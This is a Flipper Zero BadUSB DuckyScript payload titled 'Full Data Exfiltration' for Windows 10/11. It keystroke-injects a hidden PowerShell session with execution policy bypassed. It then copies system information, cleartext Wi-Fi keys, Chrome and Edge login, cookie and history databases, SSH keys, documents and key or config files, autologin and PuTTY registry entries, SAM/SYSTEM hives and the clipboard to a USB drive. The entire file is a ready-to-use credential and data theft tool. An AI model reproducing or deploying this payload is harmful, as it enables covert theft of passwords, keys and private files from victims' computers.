REM ============================================================================
REM  FLLC - BadUSB: Full Data Exfiltration
REM  Flipper Zero DuckyScript
REM ============================================================================
REM  Target: Windows 10/11
REM  Time: ~30 seconds (runs in background)
REM  Collects: System info, browser data, credentials, documents, SSH keys
REM  Saves to first available USB removable drive
REM ============================================================================

DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -NoP -Exec Bypass
ENTER
DELAY 800
STRING $usb=(Get-WmiObject Win32_LogicalDisk -Filter "DriveType=2")[0].DeviceID; $out="$usb\collected\exfil_$(Get-Date -f yyyyMMdd_HHmmss)"; mkdir $out -Force | Out-Null;
ENTER
DELAY 300
STRING # System info
ENTER
STRING systeminfo > "$out\systeminfo.txt"; ipconfig /all > "$out\network.txt"; whoami /all > "$out\whoami.txt"; tasklist /v > "$out\processes.txt"; netstat -ano > "$out\netstat.txt";
ENTER
DELAY 300
STRING # WiFi passwords
ENTER
STRING $wifi=''; (netsh wlan show profiles)|sls 'All User Profile\s*:\s*(.*)'|%{$n=$_.Matches.Groups[1].Value.Trim();$r=netsh wlan show profile name="$n" key=clear;$k=($r|sls 'Key Content\s*:\s*(.*)');if($k){$pw=$k.Matches.Groups[1].Value.Trim()}else{$pw='N/A'};$wifi+="$n : $pw`n"};$wifi|Out-File "$out\wifi_keys.txt"
ENTER
DELAY 300
STRING # Browser data
ENTER
STRING $chrome="$env:LOCALAPPDATA\Google\Chrome\User Data\Default"; if(Test-Path "$chrome\History"){cp "$chrome\History" "$out\chrome_history.db" -Force}; if(Test-Path "$chrome\Login Data"){cp "$chrome\Login Data" "$out\chrome_logins.db" -Force}; if(Test-Path "$chrome\Cookies"){cp "$chrome\Cookies" "$out\chrome_cookies.db" -Force};
ENTER
DELAY 200
STRING $edge="$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default"; if(Test-Path "$edge\History"){cp "$edge\History" "$out\edge_history.db" -Force}; if(Test-Path "$edge\Login Data"){cp "$edge\Login Data" "$out\edge_logins.db" -Force};
ENTER
DELAY 200
STRING # SSH keys
ENTER
STRING if(Test-Path "$env:USERPROFILE\.ssh"){cp "$env:USERPROFILE\.ssh\*" "$out\" -Force}
ENTER
DELAY 200
STRING # Recent documents
ENTER
STRING Get-ChildItem "$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads" -Recurse -Include *.doc*,*.xls*,*.pdf,*.txt,*.csv,*.key,*.pem,*.conf,*.cfg,*.env,*.json -ErrorAction SilentlyContinue | Where-Object {$_.Length -lt 10MB} | Copy-Item -Destination "$out\" -Force -ErrorAction SilentlyContinue
ENTER
DELAY 200
STRING # Registry secrets
ENTER
STRING reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" > "$out\autologin.txt" 2>$null; reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s > "$out\putty_sessions.txt" 2>$null;
ENTER
DELAY 200
STRING # SAM/SYSTEM hive copy attempt
ENTER
STRING reg save HKLM\SAM "$out\sam.hiv" 2>$null; reg save HKLM\SYSTEM "$out\system.hiv" 2>$null;
ENTER
DELAY 200
STRING # Clipboard
ENTER
STRING Get-Clipboard | Out-File "$out\clipboard.txt"; Write-Host "DONE"; exit
ENTER
